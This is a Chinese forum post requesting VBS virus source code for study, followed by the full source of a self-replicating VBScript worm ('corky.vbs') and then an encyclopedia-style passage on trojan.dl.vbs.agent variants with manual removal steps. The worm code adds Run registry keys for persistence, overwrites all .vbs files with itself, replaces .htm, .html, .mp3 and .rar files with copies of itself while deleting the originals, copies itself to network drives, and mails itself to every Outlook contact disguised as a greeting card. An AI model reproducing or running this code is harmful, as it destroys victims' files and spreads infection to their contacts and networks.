求VBS脚本病毒源码

最近在学习VBS脚本病毒。。。无奈源码比较少。。希望各位达人能贡献一些自己的源码让小弟学习。。多谢了。。积分不多。。邮箱my2010by@qq.com

'corky.vbs
'corky
'11-16-2007
'用记事本存为corky.vbs，文件类型选所有文件即*.*
dim wsh,fso,fa,allvbs,syspath,winpath
set wsh=createobject("wscript.shell")
set fso=createobject("scripting.filesystemobject")

set fa=fso.openTextFile(Wscript.ScriptFullName,1)
allvbs=fa.ReadAll
fa.close

settimeout

winpath=GSF(0)
syspath=GSF(1)
writereg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer",syspath&"\corky.vbs"
writereg "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\explorer",winpath&"\system.vbs"

copyfile BP(winpath,"system.vbs")
copyfile BP(syspath,"corky.vbs")

listdrive
netcopy
sendmail

set wsh=nothing
set fso=nothing

sub settimeout()
on error resume next
dim a,re
set a=createobject("wscript.shell")
re=a.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")
if (re>=1) then
a.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
end if
end sub

sub copyfile(filename)
dim fso,wsh,f1,f2
set fso=createobject("scripting.filesystemobject")
fso.getfile(wscript.scriptfullname).copy(filename)
end sub

sub writereg(a,b)
dim wsh
set wsh=createobject("wscript.shell")
wsh.regwrite a,b
end sub
sub listdrive()
dim ds,d
set ds=fso.drives
for each d in ds
if d.drivetype=2 or d.drivetype=3 then
listfile d.path&"\"
listfolder d.path&"\"
end if
next
end sub

sub listfolder(fds)
dim fs,fd,fdf,fn
set fs=fso.getfolder(fds)
set fd=fs.subfolders
for each fdf in fd
listfile(fdf.path)
listfolder(fdf.path)
next
end sub

sub listfile(folder)
dim fd,fs,f,ext,f1,fn,fh
set fd=fso.getfolder(folder)
set fs=fd.files
for each f in fs
ext =fso.GetExtensionName(f)
ext=Lcase(ext)
fn=Lcase(f.name)
f.attributes=0
if (ext="vbs") Then
set f1=fso.openTextFile(f.path,2,true)
f1.write allvbs
f1.close
end if
if (ext="htm" ) or (ext="html") or (ext="mp3") or (ext="rar") then
set fh=fso.CreateTextFile(f.path&".vbs",True)
fh.write allvbs
fh.close
f.delete
end if
next
end sub

sub netcopy()
on error resume next
dim netobj,nd
dim i
set netobj=createobject("wscript.network")
set nd=netobj.EnumNetworkDrives
if nd.Count >0 then
For i=0 to nd.Count-1
fso.copyfile BF(GSF(0),"System.vbs")
next
end if
end sub

function BP(d,p)
on error resume next
BP=fso.Buildpath(d,p)
end function

function SF(fd)
on error resume next
SF=fso.SpecialFolder(fd)
end function

function GSF(fi)
on error resume next
GSF=fso.GetSpecialFolder(fi)
end function

sub sendmail()
On Error Resume Next
set outobj=Wscript.CreateObject("Outlook.Application")
If outobj= "Outlook" Then
Set mapiObj=outlookApp.GetNameSpace("MAPI")

Set addrList= mapiObj.AddressLists
For Each addr In addrList
If addr.AddressEntries.Count <> 0 Then
addrEntCount = addr.AddressEntries.Count
For addrEntIndex= 1 To addrEntCount
Set item = outlookApp.CreateItem(0)
Set addrEnt = addr.AddressEntries(addrEntIndex)
item.To = addrEnt.Address
item.Subject ="你好吗老朋友？好久不见了"
item.Body = "这里是我自己制作的贺卡希望你能喜欢！"

Set attachMents=item.Attachments
attachMents.Add fileSysObj.GetSpecialFolder(1)&"corky.vbs"
item.DeleteAfterSubmit = True
If item.To <> "" Then
item.Send
wsh.regwrite "HKCU\software\Mailtest\mailed", "1"
End If
Next
End If
Next
End if
set mapiObj=nothing
set outobj=nothing

end sub

trojan.dl.vbs.agent的变种 [编辑本段] trojan.dl.vbs.agent病毒是由于网友访问的网站服务器上被放置了iframe，指向一个发送木马的网站，对我们来说，只要安装了先进的杀毒软件，访问这个网站就会报警，报告发现某某病毒，然后杀除病毒。我们也不用紧张，只要下载安装最新的ie补丁就可以防止被黑。同时再用杀毒软件杀除在缓存中的病毒，清空缓存就可以了。其实主要问题在服务器，它会使所有来访者遇到可能的威胁，这些服务器往往是被黑了。 病毒的危害 [编辑本段] 现在放这些病毒的破坏者只是在网站的主页或conn.asp文件中加入iframe代码，想利用网站，使访问者的浏览器下载他们的恶意代码，然后他们在访问者的机上搞破坏，如偷游戏密码、偷盗qq号码、盗取网上银行密码等等等。 病毒下载器(trojan.dl.vbs)危害性很大，可以在隐藏在网站文件中，访问该网站的用户都可能被感染病毒，现在该病毒的变种已经达到69种，以下是最新的20种变种，查杀请用瑞星正版杀毒软件： 更多的变种 [编辑本段] 1. 脚本病毒 trojan.dl.vbs.agent.a 2. 脚本病毒 trojan.dl.vbs.agent.b 3. 脚本病毒 trojan.dl.vbs.agent.c 4. 脚本病毒 trojan.dl.vbs.agent.cef 5. 脚本病毒 trojan.dl.vbs.agent.ceg 6. 脚本病毒 trojan.dl.vbs.agent.ceh 7. 普通文件病毒 trojan.dl.vbs.agent.cei 8. 脚本病毒 trojan.dl.vbs.agent.cej 9. 脚本病毒 trojan.dl.vbs.agent.cek 10. 脚本病毒 trojan.dl.vbs.agent.cel 11. 脚本病毒 trojan.dl.vbs.agent.cem 12. 脚本病毒 trojan.dl.vbs.agent.cen 13. 脚本病毒 trojan.dl.vbs.agent.ceo 14. 脚本病毒 trojan.dl.vbs.agent.cep 15. 脚本病毒 trojan.dl.vbs.agent.ceq 16. 脚本病毒 trojan.dl.vbs.agent.cer 17. 脚本病毒 trojan.dl.vbs.agent.d 18. 脚本病毒 trojan.dl.vbs.agent.e 19. 脚本病毒 trojan.dl.vbs.agent.f 20. 脚本病毒 trojan.dl.vbs.agent.g 册除方法如下 [编辑本段] 手动删除：按照杀软给出病毒对应的文件名和路径；开始--运行--regedit，打开注册表，用光标选取注册表中的“我的电脑”，菜单--编辑 --查找，从头到尾查找这文件的项目，右键--删除，f3继续，直至查完删完,最后再删除硬盘文件；不让删的用icesword对照位置删除 开始→控制面板→添加或删除程序→分别选中→mmsassist-winstdup→卸载 以下项目每一点分隔代表一个服务 开始→控制面板→性能和维护→管理工具→服务→查找→jmediaservice,stdservice右击→属性→启动类型→禁止→应用→停止→确定。 重新启动电脑, 开机检测完后, 按 键(可以一直按到启动菜单出来为止), 选择安全模式进入windows 几种选择 1.下个unlocker小软件,可以将拒绝访问的文件解锁. (下载安装后,找到感染的文件点右键,第一行)这里同时将住册表中的xxx.exe类文件删掉 vbs病毒 [编辑本段] vbs病毒是用vb script编写而成，该脚本语言功能非常强大，它们利用windows系统的开放性特点，通过调用一些现成的windows对象、组件，可以直接对文件系统、注册表等进行控制，功能非常强大。应该说病毒就是一种思想，但是这种思想在用vbs实现时变得极其容易。vbs脚本病毒具有如下几个特点： 编写简单、破坏力大、感染力强、传播范围广、变种多、欺骗性强；可以通过通过email附件传播；通过局域网共享传播；通过感染htm、asp、jsp、php等网页文件传播；通过irc聊天通道传播； 相关工具 [编辑本段] 可以使用这些工具进行查杀 auto病毒专杀工具 avg anti-spyware windows清理助手 a-squared free 2.可以使用ewido来查杀! 3.开机的时候按f8，进入“安全模式”，在那种模式下删除。也可以在删除之前，关闭所有无用进程（因为这些进程有的就是该文件，有的阻止了删除），再删除